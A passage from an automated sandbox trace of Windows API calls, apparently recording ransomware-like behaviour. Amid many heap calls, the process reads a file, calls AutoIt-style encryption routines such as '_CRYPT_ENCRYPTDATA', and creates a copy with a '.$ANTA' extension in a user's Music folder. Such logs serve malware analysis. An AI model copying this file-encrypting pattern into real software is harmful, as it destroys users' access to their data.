dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0117.422] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0117.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0117.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0117.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0117.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0117.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0117.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0117.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0117.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0117.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0117.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0117.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0117.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0117.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0117.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0117.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0117.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0117.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0117.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0117.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0117.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0117.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0117.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0117.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0117.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0117.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d92c8 [0117.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0117.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0117.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0117.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0117.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d92c8 | out: hHeap=0x1780000) returned 1 [0117.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0117.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0117.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0117.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0117.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0117.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0117.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0117.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0117.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0117.423] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\a-lwly-3ukn4pq_otnq")) returned 0x10 [0117.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0117.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0117.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0117.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0117.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0117.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0117.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0117.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0117.424] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\ymTK.m4a.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\a-lwly-3ukn4pq_otnq\\ymtk.m4a.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0117.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0117.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0117.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0117.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0117.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0117.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.426] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0117.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0117.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0117.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0117.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0117.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0117.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0117.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0117.426] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0117.426] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0117.426] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0117.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0117.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0117.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0117.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0117.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0117.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0117.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0117.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0117.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0117.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0117.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e01020 [0117.430] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0117.430] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144e820*=0x10000, lpOverlapped=0x0) returned 1 [0117.432] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144e820*=0x1773, lpOverlapped=0x0) returned 1 [0117.432] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0117.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0117.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11773) returned 0x4516010 [0117.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e01020 | out: hHeap=0x1780000) returned 1 [0117.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0117.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0117.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0117.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0117.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0117.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11773) returned 0x4527790 [0117.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0117.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.435] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0117.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0117.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0117.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0117.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11773) returned 0x4516010 [0117.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0117.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0117.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.436] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0117.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0117.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0117.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0117.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0117.436] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0117.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0117.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0117.436] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0117.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0117.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0117.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0117.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2900 [0117.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0117.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0117.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0117.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0117.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11773) returned 0x4516010 [0117.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2830 [0117.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0117.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28b0 [0117.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0117.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0117.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2770 [0117.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0117.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0117.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cace8 [0117.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0117.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0117.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0117.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0117.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0117.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11773) returned 0x4538f10 [0117.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0117.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0117.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0117.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0117.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0117.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0117.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0117.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0117.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0117.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0117.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0117.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0117.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0117.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0117.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0117.438] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0117.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0117.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0117.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0117.438] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0117.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0117.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0117.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0117.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0117.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0117.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0117.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0117.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0117.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0117.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0117.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0117.438] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0117.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0117.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0117.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28c0 [0117.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0117.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0117.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0117.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0117.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad30 [0117.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0350 [0117.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0117.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0117.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0117.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d02b0 [0117.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0117.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0117.439] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0117.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d03a0 [0117.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0117.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0117.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0117.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0117.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0117.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0117.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0580 [0117.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0117.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0117.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0117.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0117.439] 